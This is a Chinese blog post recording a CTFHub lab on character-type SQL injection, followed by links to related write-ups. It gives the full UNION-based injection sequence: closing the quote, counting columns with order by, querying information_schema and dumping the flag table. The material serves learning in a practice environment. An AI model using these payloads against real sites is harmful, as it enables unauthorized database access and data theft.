SQL注入学习记录 CTFHub SQL注入 字符型注入

最新推荐文章于 2024-06-12 17:05:56 发布
最新推荐文章于 2024-06-12 17:05:56 发布
阅读量942 收藏 6
点赞数 2
分类专栏: CTF学习 文章标签: sql mysql 安全漏洞 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45653588/article/details/106339242
版权

打开页面后,可以看见界面和整数型注入长得差不多:
在这里插入图片描述
先输入1,回显:
在这里插入图片描述然后输入1',得到:
在这里插入图片描述
自动给我们加上了单引号,这也是和整数型注入的区别,字符型注入参数需要单引号来闭合,整数型不需要。
这里如果接着想在后面输入语句的话,就要手动给参数加上单引号,然后将他加上的单引号注释掉。
Mysql 有三种常用注释符:

– 注意,这种注释符后边有一个空格

# 通过#进行注释

/* */ 注释掉符号内的内容

于是我们输入1' and 1=1#,将1作为id的参数,用#将他自带的单引号注释掉,回显:
在这里插入图片描述
然后通过order by x找出该数据表的字段数量,输入1' order by 1#1' order by 2#,返回结果相同,输入1' order by 3#返回结果不同,证明字段数为2。
在这里插入图片描述
在这里插入图片描述
然后通过union注入,输入-1' union select 1,2#,回显结果:
在这里插入图片描述
说明在-1' union select 1,2#中,1,2的位置都能回显。
所以输入-1' union select 1,database()#,爆出数据库名:

在这里插入图片描述
得到数据库名sqli,接着输入-1' union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#,爆出sqli库中的表名:
在这里插入图片描述
得到表名news和flag,很明显flag就在表flag中。
然后输入-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#,爆出列名:
在这里插入图片描述
得到列名flag,最后输入-1' union select 1,group_concat(flag) from sqli.flag#,爆出字段内容:
在这里插入图片描述
成功拿到flag!
总的来说和上一题差别不大,继续学习,加油!

So4ms
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5109
Ctfhub解题 web SQL注入
SQL注入实战第一个flag!
qq_41904330的博客
08-04 6117
SQL注入实战: 登陆的是墨者平台的这个SQL实战 登陆进去后我们进行用burp进行抓包: 进行抓包获取后发送到重新器中: 看到当order by为5的时候报错了说明字段数少于5那么试一下order by 4# 发现order by 4# 没有报错说明字段数为4 我们检测一下输入的点用 select 1,2,3,4#来检测一下都在什么位置 我们来查看数据库名称:查出来为mozhe_di...
CTFHub | web—SQL注入字符注入
2301_76435948的博客
09-26 252
如果满足以上三点,可以判断该url为字符注入。服务端的sql语句为:select 列 from 数据库.表 where name=‘$name’
CTFHub:web前置技能-SQL注入-字符注入
最新发布
wdnmddbl的博客
06-12 1069
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点,希望对你有所帮助。练习sql注入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关注上车哦。大概思路和涉及的知识点sql注入基本语句和手工注入流程:#,–+,-- -代表后边忽略,常用与闭合思路:字符注入点网页链接有类似的结构。
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 8991
SQL注入原理-字符注入
CTFHub闯关之SQL注入
m0_60716947的博客
05-01 3442
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。 CTFHub 地址:CTFHub CTF.
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
SQL注入原理以及Spring Boot如何防止SQL注入(含详细示例代码)
12-29
1. 参数化查询:使用预编译的SQL语句(如PreparedStatement),将用户输入作为参数传递,而不是直接拼接到SQL字符串中。这样可以防止恶意代码改变SQL语句的结构。 2. 使用存储过程:通过存储过程与数据库交互,减少...
基于Python的机器学习检测SQL注入.zip
03-03
基于Python的机器学习检测SQL注入.zip 本项目是使用机器学习算法来分类SQL注入语句与正常语句: 使用了SVM,Adaboost,决策树,随机森林,逻辑斯蒂回归,KNN,贝叶斯等算法分别对SQL注入语句与正常语句进行分类。 ...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入讲解ppt.pptx
08-10
2. 字符 SQL 注入:使用字符串来注入 SQL 语句。 3. 时间延迟 SQL 注入:使用时间延迟来注入 SQL 语句。 4. 布尔盲注:使用布尔逻辑来注入 SQL 语句。 七、SQL 注入常用知识: 1. 注释符:#、--、+ 等符号。...
SQLi-LABS(1~10关详解)
CTF小白的博客
09-22 6453
目录SQLi-LABS Less-1查看题目环境测试注入SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-2查看题目环境测试注入SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-3查看题目环境测试注入SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-4查看题目环境测试...
“百度杯”CTF比赛 九月场 题目名称:SQLi 后台有获取flag的线索
qq_41168609的博客
07-23 742
“百度杯”CTF比赛 九月场 题目名称:SQLi 后台有获取flag的线索解题思路 解题思路 1. 具有SQL注入点连接: http://c3084761df8c4b1c91ddf64fd8c2ed4f22bb2637d78e4132.changame.ichunqiu.com/l0gin.php?id 2. 逗号之后被截断了,使用无逗号注入mysql无逗号的注入技巧 3. 判断字段个数 (SQL语句出错时,id原样输出) payload: l0gin.php?id=1%27%20order%20by%2
CTFHUB-WEB-SQL注入-字符注入
weixin_43486981的博客
08-10 440
题目: 靶机环境: 输入1查看显示,1被单引号引起来了 使用单引号’,提前闭合字符 求列数 求数据库名 求数据表名 求字段名 求字段值,得到flag
SQL 字符注入
MZa1213123的博客
03-02 4394
CTFHub SQL 字符注入 可以看到我们输入的数据会被单引号所括上 尝试正常的 1 and 1=2 发现没有报错 还是有回显 字符的 1 and 1=2 就相当于只是字符串 并没有发挥其表达式的作用所以这就没有产生错误回显 (不太明白为什么 sql 还是会查询到id = 1 的数据) 这时候我们添加 ' 手动闭合前一个 sql 语句然后再拼接上我们的 sql 语句进行测试 整个的 sql 语句大概是 $ sql = "select Data from table_name .
2021-07-08 CTFer成长之路-SQL注入-字符注入和布尔盲注
热门推荐
时光隧道
07-08 5万+
一:字符注入和布尔盲注 访问http://192.168.20.133/sql2.php?id=3-2,结果为空,猜测不是数字,可能是字符。继续尝试访问http://192.168.20.133/sql2.php?id=2a 有数据说明确实是字符。 尝试使用单引号来闭合前面的单引号,再用“–%20”或“%23”注释后面的语句。注意,这里一定要URL编码,空格的编码是“%20”,“#”的编码是“%23”,单引号的编码是“%27”。 上面的情况只是一个参数,在两个参数的情况下则可以利用MySQL自带的函
SQL注入字符注入
noob_3000的博客
08-07 546
SQL字符注入
CTFHub SQL注入 整数注入
weixin_44732566的博客
02-12 3736
CTFHub SQL注入 整数注入 强烈推荐这个网站 CTFhub https://www.ctfhub.com/ 分各个类别,题目由易到难 这题还是很基础的,有各种提示 打开是源码,?id=处存在注入 /?id=1 or 1=1 然后就是爆数据库名,information_schema三步 以下是详细步骤: ?id=1 or 1=1 union select 1,database() ...
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1080
ctfhubSQL注入中的flag是动态生成的 1、整数注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值